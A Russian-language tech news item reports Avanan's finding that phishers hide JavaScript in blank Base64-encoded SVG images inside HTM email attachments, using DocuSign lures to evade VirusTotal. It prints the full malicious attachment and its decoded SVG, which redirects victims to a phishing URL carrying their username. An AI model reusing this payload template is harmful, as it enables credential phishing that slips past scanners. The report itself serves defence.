Хакеры распространяют вредоносы в пустых изображениях в письмах / Хабр

Исследователи компании Avanan выяснили, что злоумышленники внедряют вредоносное ПО в пустые изображения в электронных письмах. Это позволяет им обходить проверку службы VirusTotal.

Хакеры отправляют жертвам мошеннический документ, связанный с сервисом управления электронными документами DocuSign. В письме говорится, что нужно просмотреть и подписать документ. По ссылке пользователь переходит на настоящую страницу DocuSign. Однако основную роль в атаке играет HTM-вл��жение, отправленное вместе со ссылкой DocuSign. В нём содержится SVG-изображение, закодированное с использованием Base64. Хотя оно пустое, этот файл имеет встроенный JavaScript-код, перенаправляющий на вредоносный URL-адрес.

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>

<body>
  <embed src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiA/PjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48Y2lyY2xlPjwvY2lyY2xlPjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij48IVtDREFUQVtwYXJlbnQud2luZG93LnBvc3RNZXNzYWdlKCJodHRwczovL2F3aW4xLmNvbS9jcmVhZC5waHA/YXdpbm1pZD0xNjMyOCZhd2luYWZmaWQ9NDIxMjI1JnVlZD1odHRwczovL25hNGRvY3VjaGVjay5uaWdodHNreS50ay8/dXNlcm5hbWU9IiwgIioiKV1dPjwvc2NyaXB0Pjwvc3ZnPg==">
  <script>
    window.addEventListener("message", (event) => {
        console.log(event)
        if (event.data)
            window.location = event.data;
    }, false);
  </script>
</body>

</html>

Если декодировать изображение, то оно выглядит так:

<?xml version="1.0" ?>

<svg xmlns="http://www.w3.org/2000/svg">

  <circle></circle>

  <script type="text/javascript">
    <![CDATA[parent.window.postMessage("https://awin1.com/cread.php?awinmid=16328&awinaffid=421225&ued=https://na4docucheck.nightsky.tk/?username=<I removed the full user name from here>", "*")]]>
  </script>

</svg>

Обычные сервисы, такие как VirusTotal, не обнаруживают вредоносы, так как они спрятаны в изображениях. В связи с этим пользователям рекомендуется с осторожностью относиться к любым письмам, содержащим вложения в формате HTML или HTM. Администраторы могут заблокировать все HTML-вложения.

Ранее исследователи сообщили, что хакеры создают поддельные сайты для популярного бесплатного программного обеспечения с открытым исходным кодом, чтобы продвигать вредоносы через рекламу в результатах поиска Google.